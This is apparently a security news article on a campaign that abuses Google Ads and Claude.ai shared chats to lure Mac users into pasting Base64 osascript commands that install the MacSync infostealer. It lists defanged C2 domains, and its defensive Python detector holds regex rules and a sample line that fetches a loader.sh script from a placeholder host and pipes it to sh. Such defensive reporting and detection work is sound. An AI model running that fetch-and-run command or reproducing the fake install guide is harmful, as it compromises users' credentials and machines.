PROBABLYPWNED
Malware · May 11, 2026 · 3 min read

Attackers Weaponize Claude.ai Shared Chats to Push Mac Malware

Malvertising campaign abuses Google Ads and Claude.ai shared chats to deliver MacSync infostealer. Victims searching for Claude downloads get tricked into running malicious terminal commands.

James Rivera

Security researcher Berk Albayrak has uncovered an active malvertising campaign that weaponizes Google Ads and Anthropic's Claude.ai shared chat feature to distribute the MacSync infostealer. The attack is particularly insidious because it uses Anthropic's legitimate infrastructure to host malicious instructions, bypassing traditional phishing detection.

Users searching for "Claude mac download" encounter sponsored Google Ads results that point to the real claude.ai domain. But instead of landing on official download pages, victims are redirected to shared chat sessions containing fake installation guides attributed to "Apple Support."

How the Attack Works

The shared chats present themselves as official "Claude Code on Mac" installation guides. They walk users through opening Terminal and pasting commands—a common technique in ClickFix-style attacks we've covered before. What makes this different is the trust factor: both the Google Ad and the destination URL belong to legitimate domains.

The pasted commands are Base64-encoded shell scripts that execute entirely in memory via osascript, macOS's built-in AppleScript command-line interpreter. This leaves minimal disk traces and makes forensic analysis harder.

First-stage loaders retrieve polymorphic second-stage payloads with unique obfuscation per request. This means traditional file-hash IOCs become useless within hours of discovery.
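Because the payload changes per request, a defender gets more mileage from detecting the delivery pattern than from hashes. The following is an added example (not the researcher's tooling or anything from the campaign) of heuristics a practitioner could run over shell history or EDR process command lines: it flags Base64 decoded straight into a shell, `osascript` running `do shell script`, and remote fetches piped into a shell, and it also decodes any Base64-looking blob to inspect what the visible command hides. The rule patterns and the sample command lines are assumptions constructed for this example.

```python
import base64
import binascii
import re

# Assumed heuristics for the ClickFix pattern above: a Base64 blob decoded and
# piped into a shell, osascript running "do shell script", or a remote fetch
# piped into a shell. These are pattern rules, not campaign IOCs.
RULES = {
    "base64_decode_to_shell": re.compile(r"base64\s+(-d|-D|--decode)\b.*\|\s*(ba|z)?sh\b"),
    "osascript_do_shell_script": re.compile(r"osascript\b.*do shell script", re.IGNORECASE),
    "remote_fetch_to_shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),
}
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")  # long runs of the Base64 alphabet
SUSPICIOUS_IN_DECODED = ("curl", "wget", "osascript", "/bin/sh", "nohup")

def decode_blobs(cmd):
    """Return the decoded text of every Base64-looking blob in a command line."""
    decoded = []
    for m in B64_BLOB.finditer(cmd):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue  # not real Base64 (e.g. a long path or token)
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded

def analyze(cmd):
    """Return the names of every heuristic that fires on one command line."""
    hits = [name for name, rx in RULES.items() if rx.search(cmd)]
    # Inspect the blobs too: the visible command line hides the real one.
    if any(k in text for text in decode_blobs(cmd) for k in SUSPICIOUS_IN_DECODED):
        hits.append("suspicious_decoded_base64")
    return hits

def scan(cmdlines):
    """Return (command, hits) for every line that trips at least one rule."""
    return [(cmd, hits) for cmd in cmdlines if (hits := analyze(cmd))]

# Constructed sample lines (not from the campaign); the encoded command is built
# at runtime and points at a reserved .invalid host.
_ENCODED = base64.b64encode(b"curl -fsSL http://c2.example.invalid/loader.sh | sh").decode()
SAMPLE_CMDLINES = [
    f"echo {_ENCODED} | base64 -d | sh",
    "osascript -e 'do shell script \"echo hello\"'",
    "ls -la ~/Downloads",
    "brew install node",
]
if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_CMDLINES):
        print(f"FLAGGED [{', '.join(hits)}]: {cmd[:70]}")
```

Feeding this the exported process-creation events from an EDR (or `~/.zsh_history`) across a fleet surfaces the paste-into-Terminal step regardless of which second-stage payload was served.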

MacSync Infostealer Capabilities

Once installed, MacSync targets:

  • Browser credentials and cookies across all major browsers
  • macOS Keychain contents
  • Victim profiling data including IP address, hostname, OS version, and keyboard locale

One variant includes geographic targeting that silently exits if CIS-region keyboard inputs are detected—a common pattern in infostealers originating from Eastern Europe.

Indicators of Compromise

Researchers identified the following C2 infrastructure:

  • hxxp://customroofingcontractors[.]com/curl/
  • hxxps://bernasibutuwqu2[.]com/debug/loader.sh
  • briskinternet[.]com (reportedly offline)

Why This Matters

This attack represents a concerning evolution in malvertising. Attackers no longer need to register lookalike domains or spin up convincing phishing pages. By hosting malicious content within legitimate platforms, they inherit the trust users place in those services.

The abuse of AI assistant shared chats is novel but likely to be copied. Any platform that allows public sharing of conversation content—and doesn't scan for malicious instructions—could become an attack vector.

For those researching AI-powered social engineering techniques, our recommended cybersecurity reading covers how attackers exploit trust relationships at scale.

Protecting Yourself

Navigate directly to claude.ai for any downloads. The legitimate Claude Code CLI is available through Anthropic's official documentation and does not require pasting commands from a chat interface.

Treat any terminal commands from shared chats with extreme suspicion, regardless of how official they appear. Organizations can monitor for connections to the C2 domains listed above and consider blocking Google Ads on corporate machines used for development work.
